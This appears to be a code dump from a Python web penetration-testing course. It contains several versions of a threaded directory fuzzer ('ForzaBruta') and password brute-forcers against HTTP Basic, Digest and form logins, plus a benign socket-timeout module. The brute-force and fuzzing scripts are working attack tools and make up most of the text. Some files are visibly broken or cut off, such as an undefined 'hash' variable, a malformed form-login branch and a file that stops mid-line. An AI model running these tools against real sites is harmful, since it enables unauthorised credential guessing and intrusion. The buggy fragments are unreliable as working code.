56 | pass
57 | if self.hidecode != code:
58 | if '200' <= code < '300':
59 | dcap = dict(DesiredCapabilities.PHANTOMJS)
60 | driver = webdriver.PhantomJS(desired_capabilities=dcap)
61 | time.sleep(2)
62 | driver.set_window_size(1024, 768)
63 | driver.get(self.url)
64 | driver.save_screenshot(self.word+".png")
65 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
66 | elif '400' <= code < '500':
67 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
68 | elif '300' <= code < '400':
69 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
70 | else:
71 | pass
72 | i[0] = i[0] - 1 # Here we remove one thread from the counter
73 | except Exception, e:
74 | print e
75 |
76 |
77 | def start(argv):
78 | banner()
79 | if len(sys.argv) < 5:
80 | usage()
81 | sys.exit()
82 | try:
83 | opts, args = getopt.getopt(argv, "w:f:t:c:")
84 | except getopt.GetoptError:
85 | print "Error en arguments"
86 | sys.exit()
87 | hidecode = 000
88 | for opt, arg in opts:
89 | if opt == '-w':
90 | url = arg
91 | elif opt == '-f':
92 | dict = arg
93 | elif opt == '-t':
94 | threads = arg
95 | elif opt == '-c':
96 | hidecode = arg
97 | try:
98 | f = open(dict, "r")
99 | words = f.readlines()
100 | except:
101 | print"Failed opening file: " + dict + "\n"
102 | sys.exit()
103 | launcher_thread(words, threads, url, hidecode)
104 |
105 |
106 | def launcher_thread(names, th, url, hidecode):
107 | global i
108 | i = []
109 | resultlist = []
110 | i.append(0)
111 | print "-------------------------------------------------------------------------------------------------------------"
112 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
113 | print "-------------------------------------------------------------------------------------------------------------"
114 | while len(names):
115 | try:
116 | if i[0] < th:
117 | n = names.pop(0)
118 | i[0] = i[0] + 1
119 | thread = request_performer(n, url,hidecode)
120 | thread.start()
121 |
122 | except KeyboardInterrupt:
123 | print "ForzaBruta interrupted by user. Finishing attack.."
124 | sys.exit()
125 | thread.join()
126 | return
127 |
128 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "ForzaBruta interrupted by user, killing all threads..!!"
134 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta-back.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | import re
7 | from termcolor import colored
8 |
9 | from selenium import webdriver
10 | from selenium.webdriver.common.keys import Keys
11 | from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
12 |
13 |
14 | def banner():
15 | print "\n***************************************"
16 | print "* ForzaBruta 0.4*"
17 | print "***************************************"
18 |
19 |
20 | def usage():
21 | print "Usage:"
22 | print " -w: url (http://somesite.com/FUZZ)"
23 | print " -t: threads"
24 | print " -f: dictionary file\n"
25 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
26 |
27 |
28 | class request_performer(Thread):
29 | def __init__(self, word, url,hidecode):
30 | Thread.__init__(self)
31 | try:
32 | self.word = word.split("\n")[0]
33 | self.urly = url.replace('FUZZ', self.word)
34 | self.url = self.urly
35 | self.hidecode = hidecode
36 | except Exception, e:
37 | print e
38 |
39 | def run(self):
40 | try:
41 | start = time.time()
42 | r = requests.get(self.url)
43 | elaptime = time.time()
44 | totaltime = str(elaptime - start)
45 | lines = str(r.content.count("\n"))
46 | chars = str(len(r._content))
47 | words = str(len(re.findall("\S+", r.content)))
48 | code = str(r.status_code)
49 | if r.history != []:
50 | first = r.history[0]
51 | code = str(first.status_code)
52 | else:
53 | pass
54 | if self.hidecode != code:
55 | if '200' <= code < '300':
56 | print totaltime + " \t" + colored(code,'green') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t"+ self.word
57 | dcap = dict(DesiredCapabilities.PHANTOMJS)
58 | driver = webdriver.PhantomJS(desired_capabilities=dcap)
59 | time.sleep(2)
60 | driver.set_window_size(1024, 768)
61 | driver.get(self.url)
62 | driver.save_screenshot(self.url+".png")
63 |
64 | elif '400' <= code < '500':
65 | print totaltime + " \t" + colored(code,'red') + "\t" + chars + " \t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
66 | elif '300' <= code < '400':
67 | print totaltime + " \t" + colored(code,'blue') + "\t" + chars + "\t" + words + "\t" + lines + "\t" + hash + "\t" + self.word
68 | else:
69 | pass
70 | i[0] = i[0] - 1 # Here we remove one thread from the counter
71 | except Exception, e:
72 | print e
73 |
74 |
75 | def start(argv):
76 | banner()
77 | if len(sys.argv) < 5:
78 | usage()
79 | sys.exit()
80 | try:
81 | opts, args = getopt.getopt(argv, "w:f:t:c:")
82 | except getopt.GetoptError:
83 | print "Error en arguments"
84 | sys.exit()
85 | hidecode = 000
86 | for opt, arg in opts:
87 | if opt == '-w':
88 | url = arg
89 | elif opt == '-f':
90 | dict = arg
91 | elif opt == '-t':
92 | threads = arg
93 | elif opt == '-c':
94 | hidecode = arg
95 | try:
96 | f = open(dict, "r")
97 | words = f.readlines()
98 | except:
99 | print"Failed opening file: " + dict + "\n"
100 | sys.exit()
101 | launcher_thread(words, threads, url, hidecode)
102 |
103 |
104 | def launcher_thread(names, th, url, hidecode):
105 | global i
106 | i = []
107 | resultlist = []
108 | i.append(0)
109 | print "-------------------------------------------------------------------------------------------------------------"
110 | print "Time" + "\t\t\t" + "Code" + "\tChars \t Words \tLines \t MD5 \t\t\t\t\t String"
111 | print "-------------------------------------------------------------------------------------------------------------"
112 | while len(names):
113 | try:
114 | if i[0] < th:
115 | n = names.pop(0)
116 | i[0] = i[0] + 1
117 | thread = request_performer(n, url, hidecode)
118 | thread.start()
119 |
120 | except KeyboardInterrupt:
121 | print "ForzaBruta interrupted by user. Finishing attack.."
122 | sys.exit()
123 | thread.join()
124 | return
125 |
126 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "ForzaBruta interrupted by user, killing all threads..!!"
132 |
--------------------------------------------------------------------------------
/Examples/Chapter04/Section-4/forzabruta.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import getopt
5 |
6 | def banner():
7 | print "\n***************************************"
8 | print "* ForzaBruta 0.1*"
9 | print "***************************************"
10 |
11 | def usage():
12 | print "Usage:"
13 | print " -w: url (http://somesite.com/FUZZ)"
14 | print " -t: threads"
15 | print " -f: dictionary file\n"
16 | print "example: forzabruta.py -w http://www.targetsite.com/FUZZ -t 5 -f common.txt\n"
17 |
18 |
19 | class request_performer(Thread):
20 | def __init__( self,word,url):
21 | Thread.__init__(self)
22 | try:
23 | self.word = word.split("\n")[0]
24 | self.urly = url.replace('FUZZ',self.word)
25 | self.url = self.urly
26 | except Exception, e:
27 | print e
28 |
29 | def run(self):
30 | try:
31 | r = requests.get(self.url)
32 | print self.url + " - " + str(r.status_code)
33 | i[0]=i[0]-1 #Here we remove one thread from the counter
34 | except Exception, e:
35 | print e
36 |
37 | def start(argv):
38 | banner()
39 | if len(sys.argv) < 5:
40 | usage()
41 | sys.exit()
42 | try :
43 | opts, args = getopt.getopt(argv,"w:f:t:")
44 | except getopt.GetoptError:
45 | print "Error en arguments"
46 | sys.exit()
47 |
48 | for opt,arg in opts :
49 | if opt == '-w' :
50 | url=arg
51 | elif opt == '-f':
52 | dict= arg
53 | elif opt == '-t':
54 | threads=arg
55 | try:
56 | f = open(dict, "r")
57 | words = f.readlines()
58 | except:
59 | print"Failed opening file: "+ dict+"\n"
60 | sys.exit()
61 | launcher_thread(words,threads,url)
62 |
63 | def launcher_thread(names,th,url):
64 | global i
65 | i=[]
66 | resultlist=[]
67 | i.append(0)
68 | while len(names):
69 | try:
70 | if i[0]
4 | #
5 | # All Rights Reserved
6 | #
7 | # Permission to use, copy, modify, and distribute this software
8 | # and its documentation for any purpose and without fee is hereby
9 | # granted, provided that the above copyright notice appear in all
10 | # copies and that both that copyright notice and this permission
11 | # notice appear in supporting documentation, and that the name of
12 | # Timothy O'Malley not be used in advertising or publicity
13 | # pertaining to distribution of the software without specific, written
14 | # prior permission.
15 | #
16 | # Timothy O'Malley DISCLAIMS ALL WARRANTIES WITH REGARD TO THIS
17 | # SOFTWARE, INCLUDING ALL IMPLIED WARRANTIES OF MERCHANTABILITY
18 | # AND FITNESS, IN NO EVENT SHALL Timothy O'Malley BE LIABLE FOR
19 | # ANY SPECIAL, INDIRECT OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
20 | # WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
21 | # WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
22 | # ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR
23 | # PERFORMANCE OF THIS SOFTWARE.
24 | #
25 | ####
26 |
27 | """Timeout Socket
28 |
29 | This module enables a timeout mechanism on all TCP connections. It
30 | does this by inserting a shim into the socket module. After this module
31 | has been imported, all socket creation goes through this shim. As a
32 | result, every TCP connection will support a timeout.
33 |
34 | The beauty of this method is that it immediately and transparently
35 | enables the entire python library to support timeouts on TCP sockets.
As an example, if you wanted SMTP connections to have a 20 second
37 | timeout:
38 |
39 | import timeoutsocket
40 | import smtplib
41 | timeoutsocket.setDefaultSocketTimeout(20)
42 |
43 |
44 | The timeout applies to the socket functions that normally block on
45 | execution: read, write, connect, and accept. If any of these
46 | operations exceeds the specified timeout, the exception Timeout
47 | will be raised.
48 |
49 | The default timeout value is set to None. As a result, importing
50 | this module does not change the default behavior of a socket. The
51 | timeout mechanism only activates when the timeout has been set to
52 | a numeric value. (This behavior mimics the behavior of the
53 | select.select() function.)
54 |
55 | This module implements two classes: TimeoutSocket and TimeoutFile.
56 |
57 | The TimeoutSocket class defines a socket-like object that attempts to
58 | avoid the condition where a socket may block indefinitely. The
59 | TimeoutSocket class raises a Timeout exception whenever the
60 | current operation delays too long.
61 |
62 | The TimeoutFile class defines a file-like object that uses the TimeoutSocket
63 | class. When the makefile() method of TimeoutSocket is called, it returns
64 | an instance of a TimeoutFile.
65 |
66 | Each of these objects adds two methods to manage the timeout value:
67 |
68 | get_timeout() --> returns the timeout of the socket or file
69 | set_timeout() --> sets the timeout of the socket or file
70 |
71 |
72 | As an example, one might use the timeout feature to create httplib
73 | connections that will timeout after 30 seconds:
74 |
75 | import timeoutsocket
76 | import httplib
77 | H = httplib.HTTP("www.python.org")
78 | H.sock.set_timeout(30)
79 |
80 | Note: When used in this manner, the connect() routine may still
81 | block because it happens before the timeout is set. To avoid
82 | this, use the 'timeoutsocket.setDefaultSocketTimeout()' function.
83 |
84 | Good Luck!
85 |
86 | """
87 |
__version__ = "$Revision: 1.23 $"
__author__ = "Timothy O'Malley "

#
# Imports
#
import select, string
import socket
# Capture the *real* socket constructor exactly once: after this module has
# been imported, socket.socket is replaced by our shim and the original is
# stashed in socket._no_timeoutsocket (see the bottom of this module).
if not hasattr(socket, "_no_timeoutsocket"):
    _socket = socket.socket
else:
    _socket = socket._no_timeoutsocket
100 |
101 |
102 | #
103 | # Set up constants to test for Connected and Blocking operations.
104 | # We delete 'os' and 'errno' to keep our namespace clean(er).
105 | # Thanks to Alex Martelli and G. Li for the Windows error codes.
106 | #
107 | import os
108 | if os.name == "nt":
109 | _IsConnected = ( 10022, 10056 )
110 | _ConnectBusy = ( 10035, )
111 | _AcceptBusy = ( 10035, )
112 | else:
113 | import errno
114 | _IsConnected = ( errno.EISCONN, )
115 | _ConnectBusy = ( errno.EINPROGRESS, errno.EALREADY, errno.EWOULDBLOCK )
116 | _AcceptBusy = ( errno.EAGAIN, errno.EWOULDBLOCK )
117 | del errno
118 | del os
119 |
120 |
121 | #
122 | # Default timeout value for ALL TimeoutSockets
123 | #
124 | _DefaultTimeout = None
125 | def setDefaultSocketTimeout(timeout):
126 | global _DefaultTimeout
127 | _DefaultTimeout = timeout
128 | def getDefaultSocketTimeout():
129 | return _DefaultTimeout
130 |
131 | #
132 | # Exceptions for socket errors and timeouts
133 | #
134 | Error = socket.error
135 | class Timeout(Exception):
136 | pass
137 |
138 |
139 | #
140 | # Factory function
141 | #
142 | from socket import AF_INET, SOCK_STREAM
143 | def timeoutsocket(family=AF_INET, type=SOCK_STREAM, proto=None):
144 | if family != AF_INET or type != SOCK_STREAM:
145 | if proto:
146 | return _socket(family, type, proto)
147 | else:
148 | return _socket(family, type)
149 | return TimeoutSocket( _socket(family, type), _DefaultTimeout )
150 | # end timeoutsocket
151 |
152 | #
153 | # The TimeoutSocket class definition
154 | #
class TimeoutSocket:
    """TimeoutSocket object
    Implements a socket-like object that raises Timeout whenever
    an operation takes too long.
    The definition of 'too long' can be changed using the
    set_timeout() method.
    """

    # _copies counts TimeoutFile objects handed out by makefile(); the real
    # socket is only closed once every copy has been closed (see close()).
    _copies = 0
    # _blocking mirrors the caller-requested blocking mode (1 = blocking).
    _blocking = 1

    def __init__(self, sock, timeout):
        # sock: the real socket being wrapped
        # timeout: seconds, or None to disable the timeout mechanism
        self._sock = sock
        self._timeout = timeout
    # end __init__

    def __getattr__(self, key):
        # Delegate anything we don't define to the wrapped socket.
        return getattr(self._sock, key)
    # end __getattr__

    def get_timeout(self):
        """Return the current timeout value (seconds or None)."""
        return self._timeout
    # end get_timeout

    def set_timeout(self, timeout=None):
        """Set the timeout; None disables the timeout mechanism."""
        self._timeout = timeout
    # end set_timeout

    def setblocking(self, blocking):
        # Record the requested mode, then apply it to the real socket.
        self._blocking = blocking
        return self._sock.setblocking(blocking)
    # end setblocking

    def connect_ex(self, addr):
        """connect() variant returning an error code instead of raising."""
        errcode = 0
        try:
            self.connect(addr)
        except Error, why:
            errcode = why[0]
        return errcode
    # end connect_ex

    def connect(self, addr, port=None, dumbhack=None):
        """Connect with timeout: attempt a non-blocking connect, then wait
        in select() up to self._timeout seconds; raises Timeout on expiry.
        dumbhack flags the second (post-select) pass of this method."""
        # In case we were called as connect(host, port)
        if port != None: addr = (addr, port)

        # Shortcuts
        sock = self._sock
        timeout = self._timeout
        blocking = self._blocking

        # First, make a non-blocking call to connect
        try:
            sock.setblocking(0)
            sock.connect(addr)
            sock.setblocking(blocking)
            return
        except Error, why:
            # Set the socket's blocking mode back
            sock.setblocking(blocking)

            # If we are not blocking, re-raise
            if not blocking:
                raise

            # If we are already connected, then return success.
            # If we got a genuine error, re-raise it.
            errcode = why[0]
            if dumbhack and errcode in _IsConnected:
                return
            elif errcode not in _ConnectBusy:
                raise

        # Now, wait for the connect to happen
        # ONLY if dumbhack indicates this is pass number one.
        # If select raises an error, we pass it on.
        # Is this the right behavior?
        if not dumbhack:
            r,w,e = select.select([], [sock], [], timeout)
            if w:
                return self.connect(addr, dumbhack=1)

        # If we get here, then we should raise Timeout
        raise Timeout("Attempted connect to %s timed out." % str(addr) )
    # end connect

    def accept(self, dumbhack=None):
        """accept() with timeout: returns (TimeoutSocket, addr), or raises
        Timeout after self._timeout seconds with no incoming connection."""
        # Shortcuts
        sock = self._sock
        timeout = self._timeout
        blocking = self._blocking

        # First, make a non-blocking call to accept
        # If we get a valid result, then convert the
        # accept'ed socket into a TimeoutSocket.
        # Be careful about the blocking mode of ourselves.
        try:
            sock.setblocking(0)
            newsock, addr = sock.accept()
            sock.setblocking(blocking)
            timeoutnewsock = self.__class__(newsock, timeout)
            timeoutnewsock.setblocking(blocking)
            return (timeoutnewsock, addr)
        except Error, why:
            # Set the socket's blocking mode back
            sock.setblocking(blocking)

            # If we are not supposed to block, then re-raise
            if not blocking:
                raise

            # If we got a genuine error, re-raise it.
            errcode = why[0]
            if errcode not in _AcceptBusy:
                raise

        # Now, wait for the accept to happen
        # ONLY if dumbhack indicates this is pass number one.
        # If select raises an error, we pass it on.
        # Is this the right behavior?
        if not dumbhack:
            r,w,e = select.select([sock], [], [], timeout)
            if r:
                return self.accept(dumbhack=1)

        # If we get here, then we should raise Timeout
        raise Timeout("Attempted accept timed out.")
    # end accept

    def send(self, data, flags=0):
        """send() that first waits (up to the timeout) for writability;
        returns the underlying send()'s byte count."""
        sock = self._sock
        if self._blocking:
            r,w,e = select.select([],[sock],[], self._timeout)
            if not w:
                raise Timeout("Send timed out")
        return sock.send(data, flags)
    # end send

    def recv(self, bufsize, flags=0):
        """recv() that first waits (up to the timeout) for readability."""
        sock = self._sock
        if self._blocking:
            r,w,e = select.select([sock], [], [], self._timeout)
            if not r:
                raise Timeout("Recv timed out")
        return sock.recv(bufsize, flags)
    # end recv

    def makefile(self, flags="r", bufsize=-1):
        # Each TimeoutFile shares this socket; count it so close() knows
        # when the last user is gone.
        self._copies = self._copies +1
        return TimeoutFile(self, flags, bufsize)
    # end makefile

    def close(self):
        # Only close the real socket once all makefile() copies are closed.
        if self._copies <= 0:
            self._sock.close()
        else:
            self._copies = self._copies -1
    # end close

# end TimeoutSocket
315 |
316 |
class TimeoutFile:
    """TimeoutFile object
    Implements a file-like object on top of TimeoutSocket.
    """

    def __init__(self, sock, mode="r", bufsize=4096):
        # mode is accepted for file-API compatibility but otherwise unused.
        self._sock = sock
        self._bufsize = 4096        # default used when bufsize <= 0 (e.g. -1)
        if bufsize > 0: self._bufsize = bufsize
        # _inqueue buffers bytes received but not yet consumed; it lives on
        # the socket object so all file copies share a single buffer.
        if not hasattr(sock, "_inqueue"): self._sock._inqueue = ""

    # end __init__

    def __getattr__(self, key):
        # Delegate unknown attributes (e.g. recv, send) to the TimeoutSocket.
        return getattr(self._sock, key)
    # end __getattr__

    def close(self):
        # Closes (or decrements the copy count of) the underlying socket.
        self._sock.close()
        self._sock = None
    # end close

    def write(self, data):
        self.send(data)
    # end write

    def read(self, size=-1):
        """Read up to `size` bytes (everything until EOF if size < 0)."""
        _sock = self._sock
        _bufsize = self._bufsize
        while 1:
            datalen = len(_sock._inqueue)
            if datalen >= size >= 0:
                break
            bufsize = _bufsize
            if size > 0:
                bufsize = min(bufsize, size - datalen )
            buf = self.recv(bufsize)
            if not buf:
                break
            _sock._inqueue = _sock._inqueue + buf
        data = _sock._inqueue
        _sock._inqueue = ""
        # Push back anything beyond the requested size for the next read.
        if size > 0 and datalen > size:
            _sock._inqueue = data[size:]
            data = data[:size]
        return data
    # end read

    def readline(self, size=-1):
        """Read one line, up to `size` bytes when size >= 0."""
        _sock = self._sock
        _bufsize = self._bufsize
        while 1:
            idx = string.find(_sock._inqueue, "\n")
            if idx >= 0:
                break
            datalen = len(_sock._inqueue)
            if datalen >= size >= 0:
                break
            bufsize = _bufsize
            if size > 0:
                bufsize = min(bufsize, size - datalen )
            buf = self.recv(bufsize)
            if not buf:
                break
            _sock._inqueue = _sock._inqueue + buf

        data = _sock._inqueue
        _sock._inqueue = ""
        if idx >= 0:
            # Keep everything after the newline for subsequent reads.
            idx = idx + 1
            _sock._inqueue = data[idx:]
            data = data[:idx]
        elif size > 0 and datalen > size:
            _sock._inqueue = data[size:]
            data = data[:size]
        return data
    # end readline

    def readlines(self, sizehint=-1):
        # NOTE(review): sizehint is accepted for file-API compatibility but
        # ignored; this always reads until EOF.
        result = []
        data = self.read()
        while data:
            idx = string.find(data, "\n")
            if idx >= 0:
                idx = idx + 1
                result.append( data[:idx] )
                data = data[idx:]
            else:
                result.append( data )
                data = ""
        return result
    # end readlines

    def flush(self): pass  # nothing is buffered on the write side

# end TimeoutFile
413 |
414 |
415 | #
416 | # Silently replace the socket() builtin function with
417 | # our timeoutsocket() definition.
418 | #
419 | if not hasattr(socket, "_no_timeoutsocket"):
420 | socket._no_timeoutsocket = socket.socket
421 | socket.socket = timeoutsocket
422 | del socket
423 | socket = timeoutsocket
424 | # Finis
425 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/Section 5 - Video 2.pptx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/PacktPublishing/Learning-Python-Web-Penetration-Testing/04f51bcf9350411b2fb38d9c4a256c581785e0e0/Examples/Chapter05/Section-5/Section 5 - Video 2.pptx
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2basics.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 |
global hit  # Flag to know when we have a valid password (note: `global` is a no-op at module scope)
hit = "1"   # "1" = still searching; a worker sets it to "0" on success
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* Basic Authentication bruteforcer 1.0*"
15 | print "***************************************"
16 |
17 |
18 | def usage():
19 | print "Usage:"
20 | print " -w: url (http://somesite.com/admin)"
21 | print " -u: username"
22 | print " -t: threads"
23 | print " -f: dictionary file\n"
24 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
25 |
26 |
class request_performer(Thread):
    # One worker per password candidate: tries HTTP Basic auth and flips
    # the global `hit` flag to "0" on the first 200 response.
    def __init__(self, name, user, url):
        Thread.__init__(self)
        self.password = name.split("\n")[0]  # strip trailing newline from dictionary line
        self.username = user
        self.url = url
        print "-" + self.password + "-"  # debug trace of the candidate being tried

    def run(self):
        global hit
        if hit == "1":  # another thread may have already found the password
            try:
                r = requests.get(self.url, auth=(self.username, self.password))
                if r.status_code == 200:
                    hit = "0"
                    print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
                    # NOTE(review): sys.exit() inside a worker only raises
                    # SystemExit in this thread; the success path also skips
                    # the i[0] decrement -- the launcher relies on `hit`.
                    sys.exit()
                else:
                    print "Not valid " + self.password
                    i[0] = i[0] - 1 # Here we remove one thread from the counter
            except Exception, e:
                print e
49 |
50 |
51 | def start(argv):
52 | banner()
53 | if len(sys.argv) < 5:
54 | usage()
55 | sys.exit()
56 | try:
57 | opts, args = getopt.getopt(argv, "u:w:f:t:")
58 | except getopt.GetoptError:
59 | print "Error en arguments"
60 | sys.exit()
61 |
62 | for opt, arg in opts:
63 | if opt == '-u':
64 | user = arg
65 | elif opt == '-w':
66 | url = arg
67 | elif opt == '-f':
68 | dictio = arg
69 | elif opt == '-t':
70 | threads = arg
71 | try:
72 | f = open(dictio, "r")
73 | name = f.readlines()
74 | except:
75 | print"Failed opening file: " + dictio + "\n"
76 | sys.exit()
77 | launcher_thread(name, threads, user, url)
78 |
79 |
80 | def launcher_thread(names, th, username, url):
81 | global i
82 | i = []
83 | i.append(0)
84 | while len(names):
85 | if hit == "1":
86 | try:
87 | if i[0] < th:
88 | n = names.pop(0)
89 | i[0] = i[0] + 1
90 | thread = request_performer(n, username, url)
91 | thread.start()
92 |
93 | except KeyboardInterrupt:
94 | print "Brute forcer interrupted by user. Finishing attack.."
95 | sys.exit()
96 | thread.join()
97 | else:
98 | sys.exit()
99 | return
100 |
101 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "Brute force interrupted by user, killing all threads..!!"
107 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2digest.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 | from requests.auth import HTTPDigestAuth
8 |
global hit  # Flag to know when we have a valid password (note: `global` is a no-op at module scope)
hit = "1"   # "1" = still searching; a worker sets it to "0" on success
11 |
12 |
13 | def banner():
14 | print "\n***************************************"
15 | print "* Basic password bruteforcer 1.0*"
16 | print "***************************************"
17 |
18 |
19 | def usage():
20 | print "Usage:"
21 | print "\t-w: url (http://somesite.com/admin)"
22 | print "\t-u: username"
23 | print "\t-t: threads"
24 | print "\t-f: dictionary file"
25 | print "\t-m: method (basic or digest)\n"
26 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
27 |
28 |
29 | class request_performer(Thread):
30 | def __init__(self, name, user, url, method):
31 | Thread.__init__(self)
32 | self.password = name.split("\n")[0]
33 | self.username = user
34 | self.url = url
35 | self.method = method
36 |
37 |
38 | def run(self):
39 | global hit
40 | if hit == "1":
41 | try:
42 | if self.method == "basic":
43 | r = requests.get(self.url, auth=(self.username, self.password))
44 | elif self.method == "digest":
45 | r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
46 |
47 | if r.status_code == 200:
48 | hit = "0"
49 | print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
50 | sys.exit()
51 | else:
52 | print "Not valid " + self.password
53 | i[0] = i[0] - 1 # Here we remove one thread from the counter
54 | except Exception, e:
55 | print e
56 |
57 |
58 | def start(argv):
59 | banner()
60 | if len(sys.argv) < 5:
61 | usage()
62 | sys.exit()
63 | try:
64 | opts, args = getopt.getopt(argv, "u:w:f:m:t:")
65 | except getopt.GetoptError:
66 | print "Error en arguments"
67 | sys.exit()
68 | method = "basic"
69 | for opt, arg in opts:
70 | if opt == '-u':
71 | user = arg
72 | elif opt == '-w':
73 | url = arg
74 | elif opt == '-f':
75 | dictio = arg
76 | elif opt == '-m':
77 | method = arg
78 | elif opt == '-t':
79 | threads = arg
80 | try:
81 | f = open(dictio, "r")
82 | name = f.readlines()
83 | except:
84 | print"Failed opening file: " + dictio + "\n"
85 | sys.exit()
86 | launcher_thread(name, threads, user, url, method)
87 |
88 |
89 | def launcher_thread(names, th, username, url, method):
90 | global i
91 | i = []
92 | i.append(0)
93 | while len(names):
94 | if hit == "1":
95 | try:
96 | if i[0] < th:
97 | n = names.pop(0)
98 | i[0] = i[0] + 1
99 | thread = request_performer(n, username, url, method)
100 | thread.start()
101 |
102 | except KeyboardInterrupt:
103 | print "Brute forcer interrupted by user. Finishing attack.."
104 | sys.exit()
105 | thread.join()
106 | else:
107 | sys.exit()
108 | return
109 |
110 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "Brute force interrupted by user, killing all threads..!!"
116 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/back2forms.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from threading import Thread
3 | import sys
4 | import time
5 | import getopt
6 | from termcolor import colored
7 | from requests.auth import HTTPDigestAuth
8 |
global hit  # Flag to know when we have a valid password (note: `global` is a no-op at module scope)
hit = "1"   # "1" = still searching; a worker sets it to "0" on success
11 |
12 |
13 | def banner():
14 | print "\n***************************************"
15 | print "* Password brute forcer 1.0*"
16 | print "***************************************"
17 |
18 |
19 | def usage():
20 | print "Usage:"
21 | print "\t-w: url (http://somesite.com/admin)"
22 | print "\t-u: username"
23 | print "\t-t: threads"
24 | print "\t-f: dictionary file"
25 | print "\t-m: method (basic, digest, forms)"
26 | print "\t-p: POST payload\n"
27 | print "example: back2basic.py -w http://www.somesite.com/admin -u admin -t 5 -f pass.txt\n"
28 |
29 |
30 | class request_performer(Thread):
31 | def __init__(self, name, user, url, method, payload):
32 | Thread.__init__(self)
33 | self.password = name.split("\n")[0]
34 | self.username = user
35 | self.url = url
36 | self.method = method
37 | self.payload = payload
38 | print "-" + self.password + "-"
39 |
40 | def run(self):
41 | global hit
42 | if hit == "1":
43 | try:
44 | if self.method == "basic":
45 | r = requests.get(self.url, auth=(self.username, self.password))
46 | elif self.method == "digest":
47 | r = requests.get(self.url, auth=HTTPDigestAuth(self.username, self.password))
48 | elif self.method == "form":
49 | post_payload = r.requests.post()
50 |
51 | if r.status_code == 200:
52 | hit = "0"
53 | print "[+] Password found - " + colored(self.password, 'green') + " - !!!\r"
54 | sys.exit()
55 | else:
56 | print "Not valid " + self.password
57 | i[0] = i[0] - 1 # Here we remove one thread from the counter
58 | except Exception, e:
59 | print e
60 |
61 |
62 | def start(argv):
63 | banner()
64 | if len(sys.argv) < 5:
65 | usage()
66 | sys.exit()
67 | try:
68 | opts, args = getopt.getopt(argv, "u:w:f:m:p:t:")
69 | except getopt.GetoptError:
70 | print "Error en arguments"
71 | sys.exit()
72 | method = "basic"
73 | payload = ""
74 | for opt, arg in opts:
75 | if opt == '-u':
76 | user = arg
77 | elif opt == '-w':
78 | url = arg
79 | elif opt == '-f':
80 | dictio = arg
81 | elif opt == '-m':
82 | method = arg
83 | elif opt == '-p':
84 | payload = arg
85 | elif opt == '-t':
86 | threads = arg
87 | try:
88 | f = open(dictio, "r")
89 | name = f.readlines()
90 | except:
91 | print"Failed opening file: " + dictio + "\n"
92 | sys.exit()
93 | launcher_thread(name, threads, user, url, method, payload)
94 |
95 |
96 | def launcher_thread(names, th, username, url, method, payload):
97 | global i
98 | i = []
99 | i.append(0)
100 | while len(names):
101 | if hit == "1":
102 | try:
103 | if i[0] < th:
104 | n = names.pop(0)
105 | i[0] = i[0] + 1
106 | thread = request_performer(n, username, url, method, payload)
107 | thread.start()
108 |
109 | except KeyboardInterrupt:
110 | print "Brute forcer interrupted by user. Finishing attack.."
111 | sys.exit()
112 | thread.join()
113 | else:
114 | sys.exit()
115 | return
116 |
117 |
# Script entry point: run the attack and turn Ctrl-C into a clean message.
if __name__ == "__main__":
    try:
        start(sys.argv[1:])
    except KeyboardInterrupt:
        print "Brute force interrupted by user, killing all threads..!!"
123 |
--------------------------------------------------------------------------------
/Examples/Chapter05/Section-5/brute-digest.py:
--------------------------------------------------------------------------------
1 | import requests
2 | from requests.auth import HTTPDigestAuth
3 | from threading import Thread
4 | import sys
5 | import time
6 | import getopt
7 |
global hit  # Flag to know when we have a valid password (note: `global` is a no-op at module scope)
hit = "1"   # "1" = still searching; a worker sets it to "0" on success
10 |
11 |
12 | def banner():
13 | print "\n***************************************"
14 | print "* Digest Authentication bruteforcer 1.0*"
